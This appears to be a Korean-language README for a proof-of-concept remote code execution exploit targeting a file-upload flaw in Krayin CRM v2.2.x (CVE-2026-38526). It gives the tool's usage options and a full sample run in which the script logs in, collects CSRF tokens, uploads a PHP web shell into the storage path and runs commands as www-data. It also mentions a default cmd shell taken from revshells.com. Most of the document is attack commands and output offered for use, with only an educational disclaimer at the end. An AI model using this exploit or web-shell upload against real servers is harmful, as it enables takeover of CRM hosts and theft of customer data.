
CVE-2026-38526 익스플로잇 | by infrar3d
제작: infrar3d
이것은 Krayin CRM v2.2.x(오픈 소스 고객 관계 관리 시스템)를 위해 특별히 설계된 원격 코드 실행(RCE) 개념 증명입니다. 이 스크립트는 CRM 관리 인터페이스의 파일 업로드 취약점을 자동으로 악용하여 대상 서버에서 원격 명령 실행을 달성합니다.
python3 CVE-2026-38526.py --help
usage: CVE-2026-38526.py [-h] -rh RHOST -u USERNAME -p PASSWORD -c COMMAND
Krayin CRM RCE Exploit
options:
-h, --help show this help message and exit
-rh, --rhost RHOST Remote host
-u, --username USERNAME
Username or E-mail
-p, --password PASSWORD
Password
-c, --command COMMAND
Command to execute
python3 CVE-2026-38526.py -rh http://krayin.endpoint.site -u '[email protected]' -p 's3cur3-p4ss' -c 'id'
[*] Getting login page...
[+] CSRF Token: 3b438w26pvvr2rhWToWURhAhyGPdeWZm6DRShdUd
[*] Attempting login as: [email protected]...
[+] Redirect: http://krayin.endpoint.site/admin/dashboard
[+] Login successful!
[+] Session established successfully
[+] XSRF Token: eyJpdiI6ImVDY3h5c2dRdk5JS1NXaVdJaDJGdVE9PSIsInZhbH...
[*] Getting fresh CSRF token for upload...
[+] Found _token in modal
[+] Upload CSRF Token: ZQwH7QLajl5wZdNAOSX8Sk0v7z9spW1VYrw4VESW
[*] Uploading shell...
[+] Upload response status: 200
[+] File uploaded successfully!
[+] Location: http://krayin.endpoint.site/storage/tinymce/a9e2d9a51d41723acad27dc2c7ec861d.php
[*] Executing command: id
[+] Command output:
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================
이 스크립트는 기본적으로 revshells.com에서 PHP cmd 셸을 업로드합니다.
악용 후에는 브라우저에서 열어 웹 페이지에서 명령을 보낼 수 있습니다.
이 소프트웨어와 개념 증명 코드는 교육 및 연구 목적으로만 제공됩니다.
귀하는 모든 관련 법률을 준수할 책임이 있습니다. 윤리적이고 책임감 있게 사용하십시오.